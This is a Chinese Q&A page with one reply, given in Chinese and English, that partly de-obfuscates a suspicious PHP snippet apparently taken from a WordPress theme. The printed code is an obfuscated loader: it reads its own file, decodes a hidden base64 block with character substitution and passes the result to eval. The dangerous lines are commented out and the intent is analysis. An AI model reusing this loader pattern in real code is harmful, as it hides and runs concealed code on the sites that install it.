当前位置: 文江博客话题详情

解码 Base64 数据什么是骗局

发布于 2025-01-02 06:15:23 字数 1456 浏览 3 评论 0原文

原文

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

梦太阳 2025-01-09 06:15:23

幸运的是,有免费的 PHP 测试器,可以让我们评估此类代码,而不会让我们的服务器面临风险。 http://phptester.net/ 就是一个例子,将链接的代码放在那里,并逐步反混淆它揭示了一些可疑的行为。我怀疑这是一个 WordPress 主题的functions.php 文件。

如果有人好奇并想进一步反混淆以了解这到底是什么,这是我的进度,当它尝试开始读取被 phptester.net 阻止的文件时,它会崩溃。这些有问题的行已在下面注释掉。

<?php
echo '<hr>';
echo $OOO0O0O00=__FILE__;
echo '<hr>';
echo $OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');
echo '<hr>';
echo $OO00O0000=46112;
echo '<hr>';
echo $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
echo '<hr>';
echo $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
echo '<hr>';
echo $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
echo '<hr>';
echo $O0O0000O0='OOO0000O0';
echo '<hr>';
echo ((base64_decode('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTQzKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJzY5aVpRTUdjTjJYaERkRlJzNy9vM2p3bWUwTFZINXJ1eDhQdll0S0kxSkFhYlVTV0VrZ095VHBubHpmQys0QnE9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));
echo '<hr>';

echo '<hr>';
echo $OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
echo '<hr>';
echo"if(!0) $O000O0O00=$OO0OO0000($OOO0O0O00,'rb')";
//if(!0)echo '<hr>'. $O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
echo '<hr>';
echo $OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
echo '<hr>';
echo $OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
echo '<hr>';
echo" $OO0OO000O($O000O0O00,1143)";
echo '<hr>';
//echo $OO0OO000O($O000O0O00,1143);
echo '<hr>';
echo "$OO00O00O0= ($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'69iZQMGcN2XhDdFRs7/o3jwme0LVH5rux8PvYtKI1JAabUSWEkgOyTpnlzfC+4Bq=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')))";
echo '<hr>';
//echo $OO00O00O0= ($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'69iZQMGcN2XhDdFRs7/o3jwme0LVH5rux8PvYtKI1JAabUSWEkgOyTpnlzfC+4Bq=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));

echo '<hr>';
echo '<hr>';
echo base64_decode('69iZQMGcN2XhDdFRs7/o3jwme0LVH5rux8PvYtKI1JAabUSWEkgOyTpnlzfC+4Bq=');

Fortunately, there are free PHP testers which let us evaluate this type of code without putting our server at risk. http://phptester.net/ would be one example, and putting the linked code in there, and progressively de-obfuscating it reveals some suspicious behavior. I doubt this is a wordpress theme's functions.php file.

If anyone gets curious and feels like de-obfuscating further to see what this really is, here is my progress, which breaks down when it tries to start reading files, which is blocked by phptester.net. Those offending lines are commented out below.

<?php
echo '<hr>';
echo $OOO0O0O00=__FILE__;
echo '<hr>';
echo $OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');
echo '<hr>';
echo $OO00O0000=46112;
echo '<hr>';
echo $OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
echo '<hr>';
echo $OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
echo '<hr>';
echo $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
echo '<hr>';
echo $O0O0000O0='OOO0000O0';
echo '<hr>';
echo ((base64_decode('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTQzKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJzY5aVpRTUdjTjJYaERkRlJzNy9vM2p3bWUwTFZINXJ1eDhQdll0S0kxSkFhYlVTV0VrZ095VHBubHpmQys0QnE9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));
echo '<hr>';

echo '<hr>';
echo $OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
echo '<hr>';
echo"if(!0) $O000O0O00=$OO0OO0000($OOO0O0O00,'rb')";
//if(!0)echo '<hr>'. $O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
echo '<hr>';
echo $OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
echo '<hr>';
echo $OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
echo '<hr>';
echo" $OO0OO000O($O000O0O00,1143)";
echo '<hr>';
//echo $OO0OO000O($O000O0O00,1143);
echo '<hr>';
echo "$OO00O00O0= ($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'69iZQMGcN2XhDdFRs7/o3jwme0LVH5rux8PvYtKI1JAabUSWEkgOyTpnlzfC+4Bq=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')))";
echo '<hr>';
//echo $OO00O00O0= ($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'69iZQMGcN2XhDdFRs7/o3jwme0LVH5rux8PvYtKI1JAabUSWEkgOyTpnlzfC+4Bq=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));

echo '<hr>';
echo '<hr>';
echo base64_decode('69iZQMGcN2XhDdFRs7/o3jwme0LVH5rux8PvYtKI1JAabUSWEkgOyTpnlzfC+4Bq=');
回复 原文
~没有更多了~

关于作者

时光清浅

暂无简介

文章
评论
496 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

櫻之舞

文章 0 评论 0

弥枳

文章 0 评论 0

m2429

文章 0 评论 0

寻找一个思念的角度

文章 0 评论 0

野却迷人

文章 0 评论 0

我怀念的。

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文